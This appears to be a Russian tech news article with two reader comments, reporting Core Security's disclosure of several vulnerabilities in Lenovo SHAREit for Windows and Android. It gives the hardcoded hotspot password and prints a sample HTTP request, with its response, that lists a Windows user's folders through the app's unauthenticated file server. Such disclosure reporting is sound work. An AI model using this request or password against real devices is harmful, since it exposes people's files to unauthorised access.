Специалист по информационной безопасности Иван Уэртас (Ivan Huertas) из Core Security Consulting Team смог обнаружить сразу несколько уязвимостей в программном обеспечении Lenovo для Windows и Android. Речь идет о Lenovo SHAREit. Одна из наиболее заметных проблем (CVE-2016-1491) заключается в том, что Windows приложение Lenovo работает с одним и тем же неизменяемым паролем.
Так, при получении файлов с использованием этого приложения «по воздуху» создается точка доступа с паролем 12345678. Таким образом, к такой точке доступа может подключиться практически любое сетевое устройство.
Что касается других уязвимостей, то CVE-2016-1490, например, позволяет стороннему человеку просматривать файлы с отправкой HTTP-запроса серверу, который запущен Lenovo SHAREit. При этом приложение отправляет файлы по HTTP-протоколу в незашифрованном виде.
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)
Host: 192.168.173.1:2999
Connection: Keep-Alivek
Accept-Encoding: gzip
Content-Length: 0
HTTP/1.0 200 OK
Content-Length: 2426
{"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links",
"has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved
Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved
Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved
Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My
","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
Пример эксплуатации уязвимости CVE-2016-1490
А уязвимость CVE-2016-1489 позволяет злоумышленнику перехватывать сетевой трафик, с просмотром передаваемых данных. При этом передаваемые файлы можно модифицировать и отправлять на компьютер жертвы.
Кроме того, уязвимость CVE-2016-1492 позволяет атакующему использовать незащищенную паролем точку доступа, с перехватом данных, которые отправляются в конкретный момент времени.
Обнаруженные уязвимости актуальны для SHAREit для Android 3.0.18_ww и SHAREit для Windows 2.5.1.1. Сейчас компания уже исправила проблему, так что эти уязвимости неактуальны.
Что касается SHAREit, то эта программа используется для передачи файлов между смартфонами, планшетами и персональными компьютерами по беспроводной связи.
Подробнее о проблеме и ее решении компанией можно прочитать здесь. Обновленные версии ПО можно скачать на сайте Lenovo.
Evengard
Очередной жёлтый заголовок. «Был зашит» тогда уж, ведь
Taciturn
Программа отказывается запускаться при наличии обновлений или обновляется не спрашивая пользователей? Если нет, то уязвимости будут актуальны ещё долго.